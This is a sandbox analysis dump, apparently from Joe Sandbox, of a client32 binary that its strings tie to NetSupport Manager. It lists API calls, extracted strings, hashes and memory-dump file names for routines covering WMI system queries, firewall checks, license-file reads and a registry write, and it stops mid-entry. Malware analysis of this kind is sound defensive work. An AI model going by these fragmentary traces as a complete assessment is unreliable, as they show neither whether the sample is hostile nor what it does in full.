                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                                                        • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                                        • API String ID: 3494822531-1878648853
                                                                                        • Opcode ID: 1e9a8547f1a4d8db54bad5cbccf33acd14b41b9136434f7006fca57feb396e97
                                                                                        • Instruction ID: 9d2f35c0ca678663173c9787aa50c950699104b7f99c1a06bf1b906e54d037ce
                                                                                        • Opcode Fuzzy Hash: 1e9a8547f1a4d8db54bad5cbccf33acd14b41b9136434f7006fca57feb396e97
                                                                                        • Instruction Fuzzy Hash: F3515E76D0422E9BEB15CF24DC50BDDF7B4AF15708F6001A4DC897B681EB716A88CB91
                                                                                        APIs
                                                                                        • IsJPIK.PCICHEK(B24479DC,NSM.LIC,?,1102F092,View,Client,Bridge), ref: 1102A6F6
                                                                                          • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                          • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                          • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                          • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _free_malloc_memsetwsprintf
                                                                                        • String ID: IKS$NSM.LIC$Serial_no$_License$iks.lic
                                                                                        • API String ID: 2814900446-469156069
                                                                                        • Opcode ID: 6b90f5a91e0e8404fc851c8f10d2236098875013011e5de61ca2dd828f746a24
                                                                                        • Instruction ID: 268b58c6f7511c145cb41d8ae554306eba274149ba0ed4ca5467e6687dcac3b5
                                                                                        • Opcode Fuzzy Hash: 6b90f5a91e0e8404fc851c8f10d2236098875013011e5de61ca2dd828f746a24
                                                                                        • Instruction Fuzzy Hash: 8931AF35E01729ABDB00CFA8CC81BEEFBF4AB49714F104299E826A72C0DB756940C791
                                                                                        APIs
                                                                                        • RtlDecodePointer.NTDLL(?,?,?,?,?,11163DB6,?,111DCCE0,0000000C,11163DE2,?,?,1116E4BB,11177F11), ref: 11163CC7
                                                                                        • DecodePointer.KERNEL32(?,?,?,?,?,11163DB6,?,111DCCE0,0000000C,11163DE2,?,?,1116E4BB,11177F11), ref: 11163CD4
                                                                                        • __realloc_crt.LIBCMT ref: 11163D11
                                                                                        • __realloc_crt.LIBCMT ref: 11163D27
                                                                                        • EncodePointer.KERNEL32(00000000,?,?,?,?,?,11163DB6,?,111DCCE0,0000000C,11163DE2,?,?,1116E4BB,11177F11), ref: 11163D39
                                                                                        • EncodePointer.KERNEL32(?,?,?,?,?,?,11163DB6,?,111DCCE0,0000000C,11163DE2,?,?,1116E4BB,11177F11), ref: 11163D4D
                                                                                        • EncodePointer.KERNEL32(-00000004,?,?,?,?,?,11163DB6,?,111DCCE0,0000000C,11163DE2,?,?,1116E4BB,11177F11), ref: 11163D55
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Pointer$Encode$Decode__realloc_crt
                                                                                        • String ID:
                                                                                        • API String ID: 4108716018-0
                                                                                        • Opcode ID: 78b66c0ccf40e1ea873e96cc16d33ba7024ac8dccc44993d1929be3c3bf886a8
                                                                                        • Instruction ID: 9b559eab580439f7d32e9cac7dbac1f1bc4b8bf1504d6bec0d436b7e194fb771
                                                                                        • Opcode Fuzzy Hash: 78b66c0ccf40e1ea873e96cc16d33ba7024ac8dccc44993d1929be3c3bf886a8
                                                                                        • Instruction Fuzzy Hash: EA11D632518236AFDB005F79DCD488EFBEDEB41268751043AE819D7211EBB2ED54DB80
                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(00000188,000000FF), ref: 1101792C
                                                                                        • CoInitialize.OLE32(00000000), ref: 11017935
                                                                                        • _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
                                                                                        • CoUninitialize.OLE32 ref: 110179C0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                        • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                                        • API String ID: 2407233060-578995875
                                                                                        • Opcode ID: 0942cf205f413e43a7dce2a9957458248f39d685d8b5fb2cae19ac9a1649f750
                                                                                        • Instruction ID: 979ee595df3e366e36f6db43f9274242a875182caa54ddfda208ac7f01cc4ef4
                                                                                        • Opcode Fuzzy Hash: 0942cf205f413e43a7dce2a9957458248f39d685d8b5fb2cae19ac9a1649f750
                                                                                        • Instruction Fuzzy Hash: BE213EB5D0166A9FDB11CFA48C40BBAB7E99F4170CF0000B4EC59DB188EB79D544D791
                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(00000188,000000FF), ref: 11017842
                                                                                        • CoInitialize.OLE32(00000000), ref: 1101784B
                                                                                        • _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
                                                                                        • CoUninitialize.OLE32 ref: 110178D0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                        • String ID: ChassisTypes$Win32_SystemEnclosure
                                                                                        • API String ID: 2407233060-2037925671
                                                                                        • Opcode ID: 645120171e4998cce48753e45b0062292f56c9bef21460c25a07f93c3742c313
                                                                                        • Instruction ID: 35f99737241494c501e89beb979cd88c9c6eddc8ed8b09fe319fdcc96c080ea2
                                                                                        • Opcode Fuzzy Hash: 645120171e4998cce48753e45b0062292f56c9bef21460c25a07f93c3742c313
                                                                                        • Instruction Fuzzy Hash: D7210875D4112A9BD711CFA4CD40BAEBBE89F40309F0000A4EC29DB244EE75D910C7A0
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32(756F13E0,1103070D,Client,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 1113962A
                                                                                        • GetTickCount.KERNEL32(756F13E0,1103070D,Client,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11139631
                                                                                        Strings
                                                                                        • DoICFConfig() OK, xrefs: 111396D6
                                                                                        • Client, xrefs: 11139655
                                                                                        • DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 111396EC
                                                                                        • AutoICFConfig, xrefs: 11139650
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick
                                                                                        • String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
                                                                                        • API String ID: 536389180-1512301160
                                                                                        • Opcode ID: e83ef9c3321bdfdd27f283cf6b907508dd25c61c4d3345a4079bbe31f7b349aa
                                                                                        • Instruction ID: a12453e9faa0d912da9f55e5525ca7a81223e7cd1b6d2efb44fc6fc6c8488c0a
                                                                                        • Opcode Fuzzy Hash: e83ef9c3321bdfdd27f283cf6b907508dd25c61c4d3345a4079bbe31f7b349aa
                                                                                        • Instruction Fuzzy Hash: 2B21277CA262AF4AFB12CE75DED4791FA92278232EF010178D515862CCFBB49448CF46
                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 11096DA4
                                                                                        • CLSIDFromProgID.OLE32(HNetCfg.FwMgr,?), ref: 11096DBE
                                                                                        • CoCreateInstance.OLE32(?,00000000,00000001,111C1B4C,?), ref: 11096DDB
                                                                                        • CoUninitialize.OLE32 ref: 11096DF9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFromInitializeInstanceProgUninitialize
                                                                                        • String ID: HNetCfg.FwMgr$ICF Present:
                                                                                        • API String ID: 3222248624-258972079
                                                                                        • Opcode ID: 2f37d598b4012c0c7ec1fc3c7a41f1831d77099e3c9549bb0708a0a7a71d465f
                                                                                        • Instruction ID: 9199824aa3bd6ebf99e58618a68c234682766c17c5e3bd8f83aabb27c1d0aea9
                                                                                        • Opcode Fuzzy Hash: 2f37d598b4012c0c7ec1fc3c7a41f1831d77099e3c9549bb0708a0a7a71d465f
                                                                                        • Instruction Fuzzy Hash: BC11C235F4111DABC700EFA59C84EEFFF789F44705B500468E51ADB104EA25A980C7E1
                                                                                        APIs
                                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026306
                                                                                        • K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
                                                                                        • GetProcAddress.KERNEL32(?,GetModuleFileNameExA,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026336
                                                                                        • SetLastError.KERNEL32(00000078,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026359
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressProc$ErrorFileImageLastNameProcess
                                                                                        • String ID: GetModuleFileNameExA$GetProcessImageFileNameA
                                                                                        • API String ID: 4186647306-532032230
                                                                                        • Opcode ID: 168c0276823b5447779d0ea544bca84f700d76740b4f854a777d5a44096f3b0a
                                                                                        • Instruction ID: 183e1746e0b9fc2934bd9ec846e99aaf72a90bbb460a81bb2001b4ad07131d97
                                                                                        • Opcode Fuzzy Hash: 168c0276823b5447779d0ea544bca84f700d76740b4f854a777d5a44096f3b0a
                                                                                        • Instruction Fuzzy Hash: BE012D72A41319ABE720DEA5EC44F4BB7E8EB88765F40452AF955D7600D630E8048BA0
                                                                                        APIs
                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,774E42C0,00000000,?,11110F55,11110AF0,00000001,00000000), ref: 11110057
                                                                                        • CreateThread.KERNEL32(00000000,11110F55,00000001,00000000,00000000,0000000C), ref: 1111007A
                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,11110F55,11110AF0,00000001,00000000,?,?,?,?,?,11031700), ref: 111100A7
                                                                                        • CloseHandle.KERNEL32(?), ref: 111100B1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                        • String ID: ..\ctl32\Refcount.cpp$hThread
                                                                                        • API String ID: 3360349984-1136101629
                                                                                        • Opcode ID: 4687833a1936dd26f91b2846a9cb7115301389be075d2048120d977a93bdefe6
                                                                                        • Instruction ID: 76930d23ba1481c48ceb924dc08d7adf498fcac35268297604c83f904cd53e19
                                                                                        • Opcode Fuzzy Hash: 4687833a1936dd26f91b2846a9cb7115301389be075d2048120d977a93bdefe6
                                                                                        • Instruction Fuzzy Hash: A0018435780715BFF3208EA5CD85F57FBA9DB45765F104138FA259B6C4D670E8048BA0
                                                                                        APIs
                                                                                        • RegOpenKeyExA.KERNEL32(80000002,System\CurrentControlSet\Control\GraphicsDrivers\DCI,00000000,0002001F,?), ref: 11116D7F
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 11116DB7
                                                                                        • RegSetValueExA.ADVAPI32(00000000,Timeout,00000000,00000004,00000000,00000004), ref: 11116DD3
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 11116DDD
                                                                                          • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32 ref: 11143BF0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseValue$OpenQuery
                                                                                        • String ID: System\CurrentControlSet\Control\GraphicsDrivers\DCI$Timeout
                                                                                        • API String ID: 3962714758-504756767
                                                                                        • Opcode ID: 71a3d5382f694e300ca8b739a0447eaf7c0fd6e11b25d11c78922669bca80467
                                                                                        • Instruction ID: 446fff0cae762a3aa9587799f73bfd878db9d5469a1de9e4663b70f0b9132e6a
                                                                                        • Opcode Fuzzy Hash: 71a3d5382f694e300ca8b739a0447eaf7c0fd6e11b25d11c78922669bca80467
                                                                                        • Instruction Fuzzy Hash: 9E019E75640208BBEB14DBA0CE49FEEF77CAF04705F108158FE14AA5C5DBB0AA04CB65
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf
                                                                                        • String ID: %s%s%s.bin$506013$_HF$_HW$_SW
                                                                                        • API String ID: 2111968516-3361648832
                                                                                        • Opcode ID: 503f2c815b640c3d0002ea6c51c91ecd6f409461de15ff16a7ff97f3048ceaf6
                                                                                        • Instruction ID: fa910be19caf0a14a4f119543ead50e584fafd0cecff00e00c2366bf95bcdf21
                                                                                        • Opcode Fuzzy Hash: 503f2c815b640c3d0002ea6c51c91ecd6f409461de15ff16a7ff97f3048ceaf6
                                                                                        • Instruction Fuzzy Hash: 2AE092A4E5460C9BF300A6498C11BAAFACC174475BFC4C051BFF9AB6A3E9299904C6D2
                                                                                        APIs
                                                                                        • GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 11103683
                                                                                        • GetStockObject.GDI32(00000004), ref: 111036DB
                                                                                        • RegisterClassA.USER32(?), ref: 111036EF
                                                                                        • CreateWindowExA.USER32 ref: 1110372C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
